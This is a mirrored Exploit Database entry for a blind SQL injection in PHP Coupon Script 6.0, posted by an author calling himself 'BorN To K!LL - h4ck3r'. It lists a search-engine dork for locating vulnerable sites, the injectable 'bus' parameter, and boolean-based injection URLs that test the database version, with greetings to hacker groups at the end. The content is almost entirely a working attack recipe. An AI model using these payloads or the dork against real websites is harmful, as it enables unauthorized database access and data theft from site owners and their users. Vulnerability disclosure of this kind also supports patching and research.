PHP Coupon Script 6.0 – ‘bus’ Blind SQL Injection

• Exploit Database
• 8 阅读

• 作者： h4ck3r
  日期： 2011-01-23
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/16034/

• ==
  [|]Script: PHP Coupon Script
  [|]Version: 6.0
  [|]Dork: "PHP Coupon Script v. 6.0"
  [|]Link: http://www.couponscript.com
  ==
  [|]Author: BorN To K!LL - h4ck3r
  [|]Contact: SQL@hotmail.co.uk
  ==
  [|]3xploit:
  /index.php?page=viewbus&bus=[Blind-Injection]
  
  [|]3xample:
  /index.php?page=viewbus&bus=1 and substring(version(),1,1)=4 // false ,,
  /index.php?page=viewbus&bus=1 and substring(version(),1,1)=5 // true ,,
  
  ==
  [|]Greetings:
  darkc0de team, AsbMay's group, w4ck1ng team , and "Kuwaitis"
  ==